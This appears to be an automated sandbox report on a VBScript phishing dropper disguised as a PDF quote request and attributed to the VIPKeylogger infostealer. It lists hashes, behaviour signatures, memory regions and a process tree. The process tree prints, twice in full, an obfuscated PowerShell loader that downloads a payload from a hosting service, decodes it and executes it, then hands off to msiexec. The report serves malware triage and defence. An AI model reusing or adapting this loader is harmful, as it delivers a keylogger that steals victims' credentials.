Analysis

  • max time kernel
    35s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    24-10-2024 06:41

General

  • Target

    RFQ_64182MR_PDF.R00.vbs

  • Size

    525KB

  • MD5

    63a5b7d958f537744c5330b3fef8ccac

  • SHA1

    00ba79f887c403afabdd6ffe21db30e82288f84b

  • SHA256

    ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286

  • SHA512

    3e7dd82783ffc59320bcdef7942d9b2e7de31cb40dd1c7597d5b17895e6c695888b4791b8191f80aedc0f1fe053d05785681844cf1c1cb0d16158411bffd7909

  • SSDEEP

    6144:Zf/7gXsuuCdsOQpE4V+iZeCKnoQLirdqJGfimOWIVV8T6Oj+WqXZQRhmxCDf2Nzv:u66sOQ66MfiZqbm3eVpZxxCTagc7og

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first found in 2020.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. 
nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios 
.tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN 
rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu 
pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2896
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. 
nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios 
.tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN 
rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu 
pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:2200

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEWQANB74JC5JAIXK3PO.temp

    Filesize

    7KB

    MD5

    d0a1b6f8c101524394750e499ab57ab4

    SHA1

    d76539a75d684d909358551bc0166f9fd0dc8e4a

    SHA256

    e8b790bea3d144883ec5b0fdf38a397e81a303fca748a97c6a776c0525210a4c

    SHA512

    8c2f3e896d6f423cfb102fe985b2eeaf2986f67a52830b59ac7f73414acb20b2e16e122ca306f9956af8d597cf5e6e6ad229c43d346e3dd781cb9138ae2dc78c

  • C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End

    Filesize

    440KB

    MD5

    6771cd798c1df9b5eddc60071dfc6e15

    SHA1

    65e923600e1c2604d90a481d257dc99c23fbf1dd

    SHA256

    0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f

    SHA512

    cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee

  • memory/2144-20-0x0000000006780000-0x000000000B708000-memory.dmp

    Filesize

    79.5MB

  • memory/2200-44-0x0000000000740000-0x0000000000788000-memory.dmp

    Filesize

    288KB

  • memory/2200-43-0x0000000000740000-0x00000000017A2000-memory.dmp

    Filesize

    16.4MB

  • memory/2200-42-0x0000000000740000-0x00000000017A2000-memory.dmp

    Filesize

    16.4MB

  • memory/2896-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-14-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

    Filesize

    4KB

  • memory/2896-16-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-9-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-4-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

    Filesize

    4KB

  • memory/2896-7-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize

    32KB

  • memory/2896-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB